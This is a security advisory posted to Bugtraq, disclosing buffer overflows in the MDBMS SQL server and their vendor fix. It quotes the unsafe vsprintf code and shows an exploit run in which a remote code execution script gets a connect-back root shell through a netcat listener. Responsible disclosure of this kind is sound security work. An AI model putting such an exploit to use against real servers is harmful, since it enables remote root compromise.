
Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable 
buffer overflow in the handling of the \s console command. 

When a user passes large buffers to the server in the form 
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the 
overflow.

Below is faulty code (from interface.cc):

void user::uprintf(char *s, ...)
{
  char b[10000];
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); <----
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,&parent->wmask);
}

mu-b also found a buffer overflow in the "create database" 
system. This was actually caused by a sprintf that generated 
the name of the management variable. This has been fixed - 
now table and database names can no longer be larger than 
128 bytes.

Information about the overflows was sent to marty@hinttech.com. 
He has now fixed the problems, and new versions of MDBMS can 
be found at: http://www.hinttech.com/mdbms/

We would like to thank Marty for kind response and quick update.

Exploit example:
----------------

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl

-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001

Usage: ./mdbms-pms.pl -t <hostname> -b <back>

     -t <hostname>    : hostname to test
     -b <back>        : connect back to ip
     -p <port>        : port (default: 2223)
     -d <delay>       : delay before timeout
     -o <offset>      : offset
     -h               : return to heap

[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h

-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001

-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return  : 0x80cfe76 / using the heap ...
-> Sending payload: ...

-> * Successfully sent payload - good luck!

connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...

Exploit code attached.

Sincerely yours, 
teleh0r and mu-b
